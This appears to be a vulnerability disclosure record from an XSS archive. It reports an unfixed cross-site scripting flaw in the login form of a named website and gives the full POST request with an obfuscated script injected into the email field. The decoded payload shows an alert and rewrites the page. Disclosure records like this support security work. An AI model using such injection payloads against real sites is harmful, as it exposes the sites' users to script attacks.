Security researcher bho, has submitted on 03/04/2009 a cross-site-scripting (XSS) vulnerability affecting www.007.info, which at the time of submission ranked 1532828 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 07/07/2010. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 03/04/2009 |
Date published: 07/07/2010 |
Fixed? Mail us! | Status: UNFIXED |
Author: bho |
Domain: www.007.info |
Category: XSS |
Pagerank: 1532828 |
URL: http://www.007.info/Registration/login.asp |
POST: strEmailAddress="><script>eval(String.fromCharCode(97,108,101,114,116,40,39,88,83,83,32,98,121,32,98 ,104,111,39,41,59,32,100,111,99,117,109,101,110,116,46,98,111,100,121,46,105,110,110,101,114,72,84,7 7,76,61,39,60,104,49,32,115,116,121,108,101,61,34,99,111,108,111,114,58,35,102,102,102,59,34,62,88,8 3,83,32,98,121,32,98,104,111,60,47,104,49,62,39,59))</script>&strRedirectURL=../Members/MembersIndex .asp&strMemberNo=&strPassword=&submit=Login |
Click here to view the mirror
|
|